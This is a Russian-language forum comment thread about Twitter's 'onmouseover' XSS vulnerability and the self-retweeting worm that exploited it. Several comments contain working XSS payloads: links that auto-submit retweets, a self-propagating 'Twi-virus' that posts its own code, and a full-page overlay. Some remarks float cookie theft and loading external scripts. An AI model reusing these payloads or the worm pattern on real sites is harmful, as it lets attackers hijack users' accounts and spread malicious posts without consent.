Pull to refresh

Comments 105

Молодец!

Фильтруйте все данные приходящие от пользователя!!!
В NewTwitter — работает все еще! При открытии нет, но когда идет обновление, через каждые n секунд выдается alert.
Мне вот такую штуку послали (пробел после http надо убрать):

http ://t.co/@«onmouseover=»document.getElementById('status').value='RT MoiMrJack';$('.status-update-form').submit();«font-size:500pt;/
Это такой маркетинговый ход, чтобы все переходили на новую версию твиттера, так как там это не работает :)

Кстати, так можно спастить от бага до офф. фикса
Проблема в том, что возможность перейти на новый твиттер есть далеко не у всех)
У избранных великим рандомом! Во всяком случае, в моей ленте новый твиттер может включить всего несколько человек, включая меня.
А как ты его включаешь? Через настройки?
А как вообще узнать, есть у меня эта возможность, или нет?
Сверху появится вот такая кнопочка:
Может, если подделать кнопочку у себя, она и у других включится?
Все-таки нет. Ничего, скоро и на нашей улице будет праздник.
А у меня сработало и включилось. Спасибо!
Предложения как на скриншоте выше у меня не было.
Кстати, у меня это предложение блокировал один из плагинов)
Им походу нужно форсировать распространение новой версии. Если она так долго по серверам ползет, как долго будет распространяться фикс?
А ведь стоит написать короткий скрипт, и добавить к нему трендовый хештег — и можно насобирать кучу кукисов. Кукисы с твиттера чегонибудь дают?
сморя че в них хранится
Авторизация хранится. Можно зайти под чужим аккаунтом, подменив куки.
некоторые сайты используют для авторизации твиттеровский OAuth
Так, черт, я туплю :) Пытался дотянуться до крестика вкладки, проводя мышь напрямую, через ссылку, уберите это :)
Разноцветные твиты twitter.com/RainbowTwtr появились у меня на странице, сразу все одновременно, хотя я этого RainbowTwtr не фоловил. Через минуту они исчезли.
Значит кто-то из тех кого вы фолловите ретвитнул сообщения RainbowTwtr, а потом нажал Undo
А теперь то же самое с хеш-тегом, например #prinsjesdag
с хештегом не работает — постит текстом… либо у меня руки не оттуда :)
Можете попробовать, если че:
twitter.com/thenickname#@"style="background-color:red;color:red;position:fixed;left:0;top:0;width:100%;height:100%;z-index:9999999"/
Баги твиттера иногда задалбывают. Вроде кучу денег вложили в проект, почему так трудно довести его до ума?
Новый тренд. Самое впечатляющее JS-приложение в 140 символах.
меньше, там еще ссылка, собачка, решетка, и мелочи всякие (:
возвращаемся к временам ASM, приложение в минимальном количестве символов )
Я вижу используют эту xss. Давайте хоть тег писать #twitter_xss?
символов и так мало ))
Noscript как бе говорит «пофигу» ))
UFO landed and left these words here
всё, черви пошли. не ходите на вебморду
Twi-вирус:
http: //a.no/@"onmouseover=";$('textarea:first').val
(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
Аха, уже вся лента забита. Прикольно.
А никто не пробовал еще размещать js на внешних ресурсах и подгружать их?
просто в таком случае можно-же будет вешать события не на mouseover, а, скажем на mousemove и так далее
ссылка выше на twitter.com/superbacker у него есть такие попытки, наводить проверять не стал )))
Ха, работает… бугагашенька…
Мужики, хорош херней страдать! Лента в твиттере уже совсем нечитаема
ну когда еще такое будет… ща наиграются все и надоест )
это же старая дырка… там клиент не фильтровался вроде.
Это старая уязвимость.
UFO landed and left these words here
это не акк балуется, а твивирус распространется.
UFO landed and left these words here
А какой командой удаляются аккаунты? :)
Сейчас лучше вообще не заходить на веб-морду, запросто вирусняк подцепишь.
В ленте пипец просто настал.
Спас Firebug…
Я понимаю когда найденную довольно опасную уязвимость используют обычные пользователи. Но когда крупная компания, которая стремилась создать себе на Хабре «имя» тоже начинает грешить этим — это переходит все грани. И этой самой фирмой, как ни удивительно, снова оказалась Вконтакте. Вот скриншот:



А вот тут можно глянуть исходный код, дабы исключить фальсификации. И я даже догадываюсь кто это сделал.
крупная компания грешит ламерством
Это весьма заметно. Сообщение больше 10 минут не удалялось, да и почти одновременно последовавший ретвит несколько другого сообщения от самого Цыплухина как бы намекает. Понабирали по объявлениям…
Дуров, кто-же еще =)
Забавно, даже когда пишут пост о критической уязвимости на сайте twitter.com, доблестные хабра-юзеры умудряются найти повод написать про то, какой нехороший сайт vkontakte.ru.
так это они зашли в свой твиттер через морду и словили хак, который отретвитился дальше, разве нет?
Хотите сказать, что Вконтакте преднамеренно это сделала?
За менее чем десять минут можно было сообщение удалить? Вроде как люди не совсем далекие от темы, должны были сообразить что это значит.
Попался два раза на авторетвите. Firebug помог.
А вообще, mobile.twitter.com и никаких глюков в веб-морде :)
«В целях безопасности, рекомендую временно отключить выполнение Javascript на twitter.com.»
Твиттер без скрипта не работает.
В целях безопасности сейчас лучше всего использовать внешние клиенты.
UFO landed and left these words here
новая твиттер версия упячка
Всё, уже вылечили.

Кто-нибудь может подсказать, как расшифровываются подобные строки? (переходить не рекомендую, возможно вирус):
http:\u002f\u002fis.gd\u002ffl9A7
старые посты продолжают действовать
<script language="javascript">
	document.write('http:\u002f\u002fis.gd\u002ffl5d3')
</script>
сорри, это был ответ на сообщение EvgeniyLazarev
Новое приложение Твиттера «RainbowTwtr» по популярности затмило «Ферму». ВКонтакте — рыдает :)
Ждём, когда @KremlinRussia ретвитнет радугу :)
UFO landed and left these words here
@ekozlov, @Unlevin, @alexa_cocacola — заставляют ретвить их посты скриптом всех кто за ними следует. Побанить бы их всех за такое… Бедный твиттер
UFO landed and left these words here
UFO landed and left these words here
Это не они, это скрипт сам рассылает эти твиты. Ретвитит сам себя и так распространяется.
Вообще-то уже браузер сам ретвитет кого угодно. Ахтунг. Закрываем твиттер и отдыхаем.
У меня тоже браузер сам сделал ретвит кода, ретвитов 100+. при этом home, странно себя ведет, делает редирект на direct messages.
UFO landed and left these words here
кому это интересно? Твиттеры вместе с вконтактами пора поставить на пыльную полочку и забыть о них.
А у меня после всех этих забав, главная твиттера выглядит вот так,
Only those users with full accounts are able to leave comments. Log in, please.